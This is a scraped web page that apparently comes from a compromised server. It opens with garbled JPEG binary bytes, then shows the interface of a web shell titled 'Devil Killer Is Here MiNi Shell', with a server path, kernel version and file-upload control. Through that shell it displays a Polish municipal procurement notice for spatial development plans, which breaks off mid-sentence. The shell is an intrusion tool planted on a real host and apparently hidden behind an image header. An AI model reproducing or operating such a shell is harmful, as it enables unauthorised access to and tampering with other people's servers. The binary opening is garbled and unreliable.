JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240627/0038614301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sporządzenie miejscowych planów zagospodarowania przestrzennego Gminy Krościenko Wyżne </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Krościenko Wyżne</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440577</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Południowa 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krościenko Wyżne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-422</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kroscienkowyzne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kroscienkowyzne.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sporządzenie miejscowych planów zagospodarowania przestrzennego Gminy Krościenko Wyżne </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-16344ff3-3397-11ef-8a31-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00386143</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00035999/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Sporządzenie miejscowych planów zagospodarowania przestrzennego Gminy Krościenko Wyżne</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-16344ff3-3397-11ef-8a31-0e435a8a43bc <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert,<br/>wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem<br/>wyjątków określonych w p.z.p., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej<br/>rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą<br/>elektroniczną (Dz. U. z 2020 r. poz. 344).<br/>2. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy<br/>użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>3. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Adres strony internetowej prowadzonego postępowania: https://ezamowienia.gov.pl.<br/>5. Identyfikator (ID) postępowania na Platformie e-Zamówienia: numer podany w Rozdziale I SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">14. Możliwość korzystania w<br/>postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-<br/>Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do<br/>zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na<br/>Platformie e-Zamówienia.<br/>15. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>16. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>17. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>18. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz<br/>udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>19. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@kroscienkowyzne.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parl. Europ. i<br/>Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1;<br/>zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Krościenko Wyżne;<br/>2) administrator powołał Inspektora Ochrony Danych, z którym mogą się Państwo kontaktować we<br/>wszystkich sprawach dotyczących przetwarzania danych osobowych (dane kontaktowe: Kacper Sabik,<br/>e-mail: odo@kroscienkowyzne.pl , tel. 13 43151 90 wew. 23)<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w<br/>trybie przetargu nieograniczonego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 p.z.p.<br/>5) Pani/Pana dane osobowe będą przechowywane w czasie określonym przepisami prawa, zgodnie zprzepisami archiwalnymi tj.<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w<br/>sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawieterminu przechowywania.<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisanych p.z.p., związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego.7) w odniesieniu do Pani/Pana danych<br/>osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>prawa wymagałoby po stronie administratora niewspółmiernie<br/>dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających<br/>na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego<br/>postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z p.z.p. oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa UODO, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyżpodstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z<br/>RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest UODO, ul. Stawki 2, 00-193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WGOŚ.IV.271.3.6.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia w części 1 obejmuje wykonanie usług planistycznych określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym, dla zadań: <br/>1)	sporządzenie miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej przy południowej granicy gminy;<br/>2)	sporządzenie miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie ul. Spacerowej;<br/>3)	sporządzenie miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie ul. Grunwaldzkiej;<br/>4)	sporządzenie miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie ul. Brzozowskiej;<br/>5)	sporządzenie miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie skrzyżowania ulic Brzozowskiej i Rzeszowskiej;<br/>6)	sporządzenie miejscowego planu zagospodarowania przestrzennego dla fragmentów obrębu geodezyjnego Krościenko Wyżne.<br/>2.	Wykonawca opracuje dokumentację oddzielnie dla każdego z zadań określonych w pkt. 1. <br/>3.	Przedmiot zamówienia obejmuje w szczególności opracowanie projektów miejscowych planów zagospodarowania przestrzennego Gminy Krościenko Wyżne zgodnie z:<br/>1)	Uchwałą Nr LV/400/2024 Rady Gminy Krościenko Wyżne z dnia 26 kwietnia 2024 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej przy południowej granicy gminy;<br/>2)	Uchwałą Nr LV/401/2024 Rady Gminy Krościenko Wyżne z dnia 26 kwietnia 2024 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie ul. Spacerowej;<br/>3)	Uchwała Nr LV/402/2024 Rady Gminy Krościenko Wyżne z dnia 26 kwietnia 2024 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie ul. Grunwaldzkiej;<br/>4)	Uchwała Nr LV/403/2024 Rady Gminy Krościenko Wyżne z dnia 26 kwietnia 2024 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie ul. Brzozowskiej;<br/>5)	Uchwała Nr LV/404/2024 Rady Gminy Krościenko Wyżne z dnia 26 kwietnia 2024 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla części obrębu geodezyjnego Krościenko Wyżne, położonej w rejonie skrzyżowania ulic Brzozowskiej i Rzeszowskiej;<br/>6)	Uchwała Nr LV/405/2024 Rady Gminy Krościenko Wyżne z dnia 26 kwietnia 2024 r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego dla fragmentów obrębu geodezyjnego Krościenko Wyżne.<br/>4.	Zamawiający i Wykonawca zobowiązują się współdziałać przy wykonywaniu niniejszego zamówienia w celu należytej realizacji zamówienia. <br/>5.	Przedmiot zamówienia Wykonawca zrealizuje w zakresie i formie wynikającej między innymi z przepisów: <br/>1)	ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz.U. z 2023 r. poz. 977 z późn. zm.) i aktami wykonawczymi do ww. ustawy; <br/>2)	rozporządzenia Ministra Rozwoju i Technologii w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego z dnia 17 grudnia 2021 r. (Dz. U. z 2021 r. poz. 2404 z późn. zm.); <br/>3)	ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z 2023 r. poz. 1094 z późn. zm.); <br/>4)	ustawy z dnia 19 lipca 2019 r. o zapewnianiu dostępności osobom ze szczególnymi potrzebami (Dz. U. z 2022 r. poz. 2240); <br/>5)	Uchwały Nr LI/344/2023 Rady Gminy Krościenko Wyżne z dnia 30 listopada 2023 r. w sprawie uchwalenia zmiany Studium Uwarunkowań i Kierunków Zagospodarowania Przestrzennego Gminy Krościenko Wyżne, <br/>6)	zgodnie z aktami prawa miejscowego, <br/>7)	z uwzględnieniem uwag zgłaszanych przez Zamawiającego w trakcie realizacji przedmiotu zamówienia i aktualnego orzecznictwa sądowego dotyczącego zagospodarowania przestrzennego, <br/>8)	innymi przepisami wynikającymi z odpowiednich aktów prawnych, mających odniesienie do przedmiotu zlecenia, m. in. dotyczącymi ochrony środowiska, ochrony zabytków, prawa wodnego, ochrony gruntów rolnych i leśnych, dróg, <br/>9)	pozostałymi przepisami mającymi zastosowanie w przedmiocie zamówienia. <br/>6.	Przedmiot zamówienia będzie zawierał wszystkie niezbędne dane i informacje oraz zostanie sporządzony w zakresie i formie wynikającej, w szczególności z ustaw i rozporządzeń powołanych w pkt. 6, a także będzie aktualny na dzień wydania Zamawiającemu. <br/>7.	Wykonawca oświadcza, że posiada oraz dysponuje kadrą posiadającą wiedzę, doświadczenie i umiejętności oraz uprawnienia niezbędne dla prawidłowego wykonania przedmiotu zamówienia, a czynności objęte zamówieniem wykonuje zawodowo w ramach prowadzonej działalności gospodarczej.<br/>8.	Do obowiązków Wykonawcy należy: <br/>1)	analiza materiałów wyjściowych, inwentaryzacja urbanistyczna, przygotowanie wystąpień o uzgodnienie zakresu prognozy oddziaływania na środowisko i innych wymaganych ustawą o planowaniu i zagospodarowaniu przestrzennym; <br/>2)	analiza zgłoszonych wniosków do planu wraz z propozycją (sposobem) ich rozstrzygnięcia i uzasadnieniem; <br/>3)	przedłożenie i zaprezentowanie Zamawiającemu propozycji rozstrzygnięcia zgłoszonych wniosków z uzasadnieniem; <br/>4)	sporządzenie projektu miejscowego planu zagospodarowania przestrzennego obejmującego część tekstową w formie projektu uchwały Rady Gminy Krościenko Wyżne oraz część graficzną (rysunek planu), wykonaną na dostarczonej przez Zamawiającego mapie podkładowej, zawierającą wyrys ze „Studium”, rysunki oraz teksty w wersji papierowej i elektronicznej – w skali i ilości niezbędnej do opiniowania/uzgadniania oraz umożliwiającej publikację w BIP i SIP Gminy Krościenko Wyżne (pliki: .doc, .jpg, .pdf, gml na nośniku danych); <br/>5)	opracowanie „Prognozy oddziaływania na środowisko”; <br/>6)	opracowanie „Prognozy skutków finansowych uchwalenia planu”; <br/>7)	przedłożenie i zaprezentowanie projektu planu Zamawiającemu i odpowiednim Komisjom Gminy Krościenko Wyżne; <br/>8)	przedłożenie projektu planu Gminnej Komisji Urbanistyczno-Architektonicznej w Krościenku Wyżnym i udział w posiedzeniach komisji; <br/>9)	wykonanie części graficznej i tekstowej w wersji papierowej i elektronicznej w ilości niezbędnej do przeprowadzenia procedury uzgodnień/opinii;<br/>10)	uzyskanie wymaganych ustawą o planowaniu i zagospodarowaniu przestrzennym opinii i uzgodnień; <br/>11)	wprowadzenie zmian wynikających z opinii i uzgodnień; <br/>12)	przygotowaniu wniosków o wyrażenie zgody na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne; <br/>13)	przedłożenie i zaprezentowanie projektu planu Wójtowi Gminy Krościenko Wyżne, odpowiednim Komisjom Rady Gminy Krościenko Wyżne oraz Radzie Gminy Krościenko Wyżne; <br/>14)	przygotowanie ogłoszeń o rozpoczęciu konsultacji oraz materiałów do przeprowadzenia konsultacji społecznych (wyłożenia do publicznego wglądu); <br/>15)	udział Głównego Projektanta w wymaganych przepisami formach konsultacji społecznych – Wykonawca zobowiązany jest do 5 dni obecności w okresie przeprowadzenia konsultacji społecznych (każda obecność w wymiarze 6 godzin). <br/>16)	sporządzenie protokołów z czynności przeprowadzonych w ramach konsultacji społecznych; <br/>17)	analiza uwag wniesionych do projekty planu w ramach konsultacji społecznych wraz z propozycją ich rozpatrzenia (w formie tekstowej i graficznej) z uzasadnieniem; <br/>18)	przedłożenie i zaprezentowanie Wójtowi Gminy Krościenko Wyżne, odpowiednim Komisjom Rady Gminy Krościenko Wyżne oraz Radzie Gminy Krościenko Wyżne propozycji rozstrzygnięcia uwag wniesionych w ramach konsultacji społecznych z uzasadnieniem; <br/>19)	wprowadzenie zmian wynikających z wniesionych uwag, ponowne zaopiniowanie i uzgodnienie w wymaganym zakresie wynikającym z wprowadzonych zmian; <br/>20)	przedłożenie i zaprezentowanie projektu Wójtowi Gminy Krościenko Wyżne, odpowiednim Komisjom Rady Gminy Krościenko Wyżne oraz Radzie Gminy Krościenko Wyżne. <br/>21)	przygotowanie danych przestrzennych zgodnie z Rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 26 października 2020 r. w sprawie zbiorów danych przestrzennych oraz metadanych w zakresie zagospodarowania przestrzennego (Dz. U. z 2020 r. poz. 1916 z późn. zm.); <br/>22)	przedłożenie Radzie Gminy Krościenko Wyżne projektu planu do uchwalenia; <br/>23)	przygotowanie kompletnej dokumentacji prac planistycznych zebranej w trakcie procedowania oraz uchwały wraz z załącznikami do publikacji w Dzienniku Urzędowym Województwa Podkarpackiego – oraz w wersji elektronicznej - pliki: .doc, .jpg, .pdf., gml .xml z możliwością importu do systemu Legislator na nośniku danych; <br/>24)	przygotowanie miejscowego planu zagospodarowania przestrzennego w wersji graficznej w skali 1:2000 z możliwością importu do platformy metadanych; <br/>25)	sporządzenie planu miejscowego w skali 1:2000 z wykorzystaniem urzędowych kopii map zasadniczych albo, w przypadku ich braku, map ewidencyjnych, gromadzonych w państwowym zasobie geodezyjnym i kartograficznym, uzupełnione o elementy niezbędne do celów planistycznych. <br/>26)	sporządzenie wykazu powierzchni (w hektarach i procentowo) terenów przeznaczonych w projekcie planu miejscowego pod różnego typu zabudowę, z podziałem na tereny o różnym przeznaczeniu, z uwzględnieniem wszystkich przeznaczeń terenów;<br/>27)	sporządzenie lub przygotowanie innych dokumentów niewymienionych, jeżeli ich obowiązek nakładają na Wykonawcę przepisy prawa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71410000-5 - Usługi planowania przestrzennego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">17 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) Cena – waga kryterium 60%;<br/>2) Termin płatności faktury/rachunku – waga kryterium 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania 